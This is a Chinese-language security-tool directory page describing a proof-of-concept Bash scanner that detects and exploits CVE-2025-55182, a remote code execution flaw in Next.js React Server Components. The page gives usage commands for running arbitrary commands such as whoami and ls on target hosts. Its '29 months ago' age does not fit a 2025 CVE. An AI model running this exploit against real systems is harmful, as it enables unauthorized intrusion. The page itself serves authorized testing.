Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC-CVE-2025-55182 — 用于检测和利用Next.js应用中CVE-2025-55182(React Server Components RCE)的Bash扫描器。支持自定义命令执行和URL扫描。 | Kitploit
工具/GitHubGitHub/iamblacksolo2-bugbounty/poc-cve-2025-55182
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubiamblacksolo2-bugbounty/poc-cve-2025-55182

POC-CVE-2025-55182

用于检测和利用Next.js应用中CVE-2025-55182(React Server Components RCE)的Bash扫描器。支持自定义命令执行和URL扫描。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
29个月前尚未审核
分享

CVE-2025-55182 扫描器

用于检测和利用 Next.js 应用程序中 CVE-2025-55182(React 服务器组件 RCE)漏洞的简单命令行工具。 扫描器

安装

root@kitploit:~
chmod +x scanner.sh

用法

root@kitploit:~
# Scan with default command (id)
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d example.com -c "whoami"

# With full URL
./scanner.sh -d https://example.com -c "uname -a"

选项

  • -d, --domain - 目标域名/URL(必填)
  • -c, --command - 要执行的命令(默认:id)

示例

root@kitploit:~
# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com

# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"

# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

系统要求

  • Bash
  • curl
  • openssl

免责声明

此工具仅供教育和授权安全测试目的使用。请勿将其用于您不拥有或未经授权测试的系统。

参考资料

  • CVE-2025-55182
  • React 安全公告
下载工具